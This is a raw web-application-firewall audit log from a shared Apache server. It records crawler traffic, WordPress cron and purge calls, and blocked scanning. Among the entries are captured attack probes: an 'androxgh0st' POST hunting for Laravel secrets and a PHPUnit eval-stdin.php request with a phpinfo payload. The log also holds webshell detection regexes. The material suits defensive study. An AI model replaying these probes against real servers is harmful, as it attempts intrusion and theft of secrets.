Server: Apache Engine-Mode: "ENABLED" --c2100242-Z-- --fa10c130-A-- [01/Jul/2025:02:29:44.712917 +0530] aGL6wIHgoFnbcymQaVAkKwAAAEg 20.171.207.232 34872 192.168.74.40 443 --fa10c130-B-- GET /https/payonewaytaxi.abhaytravelsindia.com/india/aaina/images/aainag/js/Rajasthan-Travel-Guides/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --fa10c130-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --fa10c130-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/https/payonewaytaxi.abhaytravelsindia.com/india/aaina/images/aainag/js/Rajasthan-Travel-Guides/hotels-udaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/https/payonewaytaxi.abhaytravelsindia.com/india/aaina/images/aainag/js/Rajasthan-Travel-Guides/hotels-udaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/https/payonewaytaxi.abhaytravelsindia.com||"] [severity "DEBUG"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751317184698458 14772 (- - -) -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f1d92f4a-Z-- --3b12b041-A-- [01/Jul/2025:02:30:00.669562 +0530] aGL60OIItec9GLT-rKpbqgAAAC4 196.251.88.57 65409 192.168.74.40 443 --3b12b041-B-- POST / HTTP/1.1 Host: 103.185.74.40 User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 20 Content-Type: application/x-www-form-urlencoded --3b12b041-C-- 0x%5B%5D=androxgh0st --3b12b041-F-- HTTP/1.1 500 Internal Server Error X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8 --3b12b041-H-- Message: Access denied with code 403 (phase 2). 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "280"] [id "77317941"] [msg "IM360 WAF: Laravel Apps Leaking Secrets exploit attempt||MV:androxgh0st||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751317200563396 106681 (- - -) Stopwatch2: 1751317200563396 106681; combined=1794, p1=175, p2=1188, p3=0, p4=0, p5=431, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --3b12b041-Z-- --3cc18163-A-- [01/Jul/2025:02:30:01.037913 +0530] aGL60YHgoFnbcymQaVAkOQAAAEg 20.171.207.232 34872 192.168.74.40 443 --3cc18163-B-- GET /aaina/images/aaina/1/js/aainag/images/rajasthan-tours-from-agra/js/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --3cc18163-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --3cc18163-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/aaina/images/aaina/1/js/aainag/images/rajasthan-tours-from-agra/js/hotels-udaipur.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/aaina/images/aaina/1/js/aainag/images/rajasthan-tours-from-agra/js/hotels-udaipur.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/aaina/images||"] [severity "DEBUG"] [tag "service_im360"] -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --30b42e1d-Z-- --a4f8515e-A-- [01/Jul/2025:02:30:31.226538 +0530] aGL67zpuhjcLQ5hUuUSW7QAAADc 196.251.88.57 53791 192.168.74.40 80 --a4f8515e-B-- GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1 Host: 103.185.74.40 User-Agent: python-requests/2.25.1 Accept-Encoding: gzip, deflate Accept: */* Connection: keep-alive Content-Length: 19 --a4f8515e-C-- <?php phpinfo(); ?> --a4f8515e-F-- HTTP/1.1 404 Not Found Accept-Ranges: bytes Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html --a4f8515e-H-- Message: Match of "rx /wp-content/plugins/all-in-one-wp-migration/lib/view/assets/javascript/backups.min.js" against "REQUEST_URI" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/002_i360_basic.conf"] [line "12"] [id "77140739"] [msg "IM360 WAF: [RBL] Dirb like fuzzing||MVN:REQUEST_URI||MV:/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: default-handler Stopwatch: 1751317231216146 10863 (- - -) Stopwatch2: 1751317231216146 10863; combined=5071, p1=127, p2=4781, p3=0, p4=0, p5=163, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --a4f8515e-Z-- --2f86cb1b-A-- [01/Jul/2025:02:30:32.196974 +0530] aGL68KJsAhnLdkyW3uhsVQAAAA8 20.171.207.232 41202 192.168.74.40 443 --2f86cb1b-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/aainag/contact-us.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --2f86cb1b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2f86cb1b-H-- Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "20"] [id "77140735"] [msg "IM360 WAF: Suspicious access attempt (webshell)||MVN:REQUEST_URI||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/aainag/contact-us.php||SC:||WPU:||RSV:7.05||RS:0||T:APACHE||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Message: Pattern match "(\\/(images|img(s)?|pictures|upload(s)?)\\/[^\\.]{0,108}\\.(pht|phtml|php\\d?$))" at REQUEST_URI. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/014_i360_infectors.conf"] [line "50"] [id "77140878"] [msg "IM360 WAF: Infectors: Suspicious access attempt (webshell)!||MVN:REQUEST_URI||WPU:||RSV:7.05||RS:0||T:APACHE||MV:/rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/https/images/images/aainag/contact-us.php||SC:/home/digitaltheka/public_html/abhaytravelsindia/rajasthan-tours-from-ahmedabad/aainag||"] [severity "DEBUG"] [tag "service_im360"] -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751318022066489 938296 (- - -) Stopwatch2: 1751318022066489 938296; combined=3128, p1=98, p2=2721, p3=120, p4=6, p5=182, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c63b235e-Z-- --cdbf857c-A-- [01/Jul/2025:02:43:44.136457 +0530] aGL-BqxbJYRWC_Yw6B3qzwAAADE 103.185.74.40 6993 192.168.74.40 443 --cdbf857c-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --cdbf857c-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --cdbf857c-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751318022659674 1477222 (- - -) Stopwatch2: 1751318022659674 1477222; combined=2296, p1=130, p2=2022, p3=0, p4=0, p5=144, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --cdbf857c-Z-- --8e5b4f0a-A-- [01/Jul/2025:02:43:45.342152 +0530] aGL-CNKDJB_mVgSnS8iu1AAAABU 103.185.74.40 23909 192.168.74.40 443 --8e5b4f0a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --8e5b4f0a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8e5b4f0a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751318024349874 993206 (- - -) Stopwatch2: 1751318024349874 993206; combined=2582, p1=108, p2=2298, p3=0, p4=0, p5=175, sr=47, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8e5b4f0a-Z-- --b2177065-A-- [01/Jul/2025:02:43:46.279668 +0530] aGL-B59d8tphawUWdwJfPwAAACI 81.88.53.143 41394 192.168.74.40 443 --b2177065-B-- POST /xmlrpc.php HTTP/1.1 Host: powerworkout.in User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67 Content-Length: 218 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, zstd, br Accept-Language: fr-FR,fr;q=0.9 Content-Type: application/xml Referer: https://powerworkout.in -- Server: Apache Engine-Mode: "ENABLED" --14bf6b4d-Z-- --be420813-A-- [01/Jul/2025:03:03:49.256343 +0530] aGMCvbBEwvoABJcvUWOYZAAAAAA 172.68.234.68 60722 192.168.74.40 443 --be420813-B-- POST /wp-cron.php?doing_wp_cron=1751319228.4770250320434570312500 HTTP/1.1 Host: nitinspinners.com X-Real-IP: 103.185.74.40 X-Remote-IP: 172.68.234.68 Content-Length: 0 x-forwarded-for: 103.185.74.40 user-agent: WordPress/6.8.1; https://nitinspinners.com content-type: application/x-www-form-urlencoded accept-encoding: gzip, br cf-ray: 9580c8bc8e03e1b7-MRS cf-ipcountry: IN accept: */* cf-visitor: {"scheme":"https"} x-forwarded-proto: https cdn-loop: cloudflare; loops=1 cf-connecting-ip: 103.185.74.40 --be420813-C-- --be420813-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 
Content-Length: 0 Content-Type: text/html; charset=UTF-8 --be420813-H-- Message: Operator EQ matched 1 at TX:trapped. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751319228.4770250320434570312500& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319229238533 18386 (- - -) Stopwatch2: 1751319229238533 18386; combined=6946, p1=130, p2=5964, p3=252, p4=5, p5=595, sr=0, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --be420813-Z-- --eebf4914-A-- [01/Jul/2025:03:03:49.336744 +0530] aGMCvIqpGWuoJtajeO4ILAAAAAs 216.73.216.38 50107 192.168.74.40 443 --eebf4914-B-- GET /robots.txt HTTP/1.1 accept: */* user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com) accept-encoding: gzip, br, zstd, deflate host: insightconvey.com --eebf4914-F-- HTTP/1.1 403 Forbidden X-Powered-By: PHP/8.1.18 X-Robots-Tag: noindex, follow Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Transfer-Encoding: chunked Content-Type: text/plain; charset=utf-8 --eebf4914-H-- Message: Access denied with code 403 (phase 2). [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/011_i360_otherapps.conf"] [line "434"] [id "77350583"] [msg "IM360 WAF: Scan attempt by claudebot crawler||UA:Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)||RSV:7.05||RS:0||T:APACHE||"] [severity "CRITICAL"] [tag "service_im360"] Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G: P: F:||RSV:7.05||RS:403||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Action: Intercepted (phase 2) Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319228271477 1068007 (- - -) Stopwatch2: 1751319228271477 1068007; combined=2108, p1=99, p2=1474, p3=0, p4=0, p5=535, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319912558156 13792 (- - -) Stopwatch2: 1751319912558156 13792; combined=2502, p1=123, p2=2270, p3=0, p4=0, p5=108, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --bcb97462-Z-- --8a4c823f-A-- [01/Jul/2025:03:15:12.701464 +0530] aGMFZ2dNAOKbtMBtE6BLmAAAAAk 103.185.74.40 2049 192.168.74.40 443 --8a4c823f-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8a4c823f-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8a4c823f-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319911038553 1663383 (- - -) Stopwatch2: 1751319911038553 1663383; combined=2240, p1=111, p2=1958, p3=0, p4=0, p5=171, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --8a4c823f-Z-- --1e00832f-A-- [01/Jul/2025:03:15:13.762653 +0530] aGMFaS21U70L7ROtKBV4cQAAABo 20.171.207.232 41852 192.168.74.40 443 --1e00832f-B-- GET /https/aainag/images/testimonials/https/images/rajasthan-tours-from-delhi/images/Rajasthan-Travel-Guides/privacy-policy.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1e00832f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1e00832f-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319913746298 16612 (- - -) Stopwatch2: 1751319913746298 16612; combined=3179, p1=137, p2=2922, p3=0, p4=0, p5=120, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1e00832f-Z-- --d9b60779-A-- [01/Jul/2025:03:15:14.137416 +0530] aGMFaCIdO1omawzGqyA-nAAAACs 103.185.74.40 47408 192.168.74.40 443 --d9b60779-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --d9b60779-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --d9b60779-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751319912913380 1224415 (- - -) Stopwatch2: 1751319912913380 1224415; combined=1827, p1=70, p2=1612, p3=0, p4=0, p5=145, sr=49, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --d9b60779-Z-- --c360754b-A-- [01/Jul/2025:03:15:14.912008 +0530] aGMFai21U70L7ROtKBV4cgAAABo 20.171.207.232 41852 192.168.74.40 443 --c360754b-B-- GET /rajasthan-tours-from-ahmedabad/aainag/aainag/js/https/images/https/Rajasthan-Travel-Guides/photo-gallery.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --c360754b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --c360754b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751320267904263 19747 (- - -) Stopwatch2: 1751320267904263 19747; combined=9036, p1=129, p2=8193, p3=311, p4=7, p5=395, sr=0, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --2b444b2f-Z-- --05ebfa03-A-- [01/Jul/2025:03:21:08.272139 +0530] aGMGzALlCjD9y3aQUU0L7AAAACI 103.185.74.40 44473 192.168.74.40 443 --05ebfa03-B-- POST /wp-cron.php?doing_wp_cron=1751320268.0429570674896240234375 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --05ebfa03-C-- --05ebfa03-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --05ebfa03-H-- Message: Operator EQ matched 1 at TX:trapped. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/000_i360_init.conf"] [line "74"] [id "33329"] [msg "IPRec: G:doing_wp_cron=1751320268.0429570674896240234375& P: F:||RSV:7.05||RS:200||T:APACHE||"] [severity "DEBUG"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751320268255693 16735 (- - -) Stopwatch2: 1751320268255693 16735; combined=5144, p1=115, p2=4330, p3=203, p4=4, p5=491, sr=54, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --05ebfa03-Z-- --d3886538-A-- [01/Jul/2025:03:21:10.048369 +0530] aGMGzm-2WMWl13laKgZAsQAAABI 172.71.163.149 40910 192.168.74.40 443 --d3886538-B-- POST /contact-enq.php HTTP/1.1 Host: mondofusion.com X-Real-IP: 170.82.180.110 X-Remote-IP: 172.71.163.149 Content-Length: 79 x-forwarded-for: 170.82.180.110 accept-encoding: gzip, br accept-language: en-US,en;q=0.9 upgrade-insecure-requests: 1 content-type: application/json cf-ray: 9580e22318312861-BEL cf-visitor: {"scheme":"https"} cache-control: max-age=0 x-forwarded-proto: https user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751321180894808 18633 (- - -) Stopwatch2: 1751321180894808 18633; combined=4421, p1=187, p2=4101, p3=0, p4=0, p5=133, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --c222123e-Z-- --90946c76-A-- [01/Jul/2025:03:36:22.880561 +0530] aGMKXoOKprISmvOCTzCTwAAAAAc 103.185.74.40 22378 192.168.74.40 443 --90946c76-B-- POST /wp-cron.php?doing_wp_cron=1751321182.6481399536132812500000 HTTP/1.1 Host: thewizblog.com User-Agent: WordPress/6.8.1; https://thewizblog.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --90946c76-C-- --90946c76-F-- HTTP/1.1 200 OK X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --90946c76-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=6725, p1=118, p2=6274, p3=326, p4=7, p5=0, sr=68, sw=0, l=0, gc=0||Py scan:9109||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751321182860680 20169 (- - -) Stopwatch2: 1751321182860680 20169; combined=7161, p1=118, p2=6274, p3=326, p4=7, p5=436, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --90946c76-Z-- --dd5f9f1e-A-- [01/Jul/2025:03:36:27.458680 +0530] aGMKY67KvIAqdeGj7xxYZQAAAB4 57.141.0.5 55032 192.168.74.40 443 --dd5f9f1e-B-- GET /rajasthan-tours-from-udaipur/rajasthan-tours-from-jaipur/rajasthan-tours-from-ahmedabad/Rajasthan-Travel-Guides/rajasthan-tours-from-jodhpur/rajasthan-tours-from-ahmedabad/rajasthan-tours-from-jodhpur/images/rajasthan-tours-from-jaipur/hotels-udaipur.php HTTP/1.1 Accept: */* User-Agent: meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler) Host: abhaytravelsindia.digitaltheka.com Connection: keep-alive --dd5f9f1e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --dd5f9f1e-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751322363015919 17298 (- - -) Stopwatch2: 1751322363015919 17298; combined=3631, p1=174, p2=3286, p3=0, p4=0, p5=170, sr=86, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e01ad93e-Z-- --2a456940-A-- [01/Jul/2025:03:56:03.567911 +0530] aGMO-2EG2ak0hLf9TCAsSAAAAAg 103.185.74.40 56782 192.168.74.40 443 --2a456940-B-- POST /wp-cron.php?doing_wp_cron=1751322363.3304018974304199218750 HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --2a456940-C-- --2a456940-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 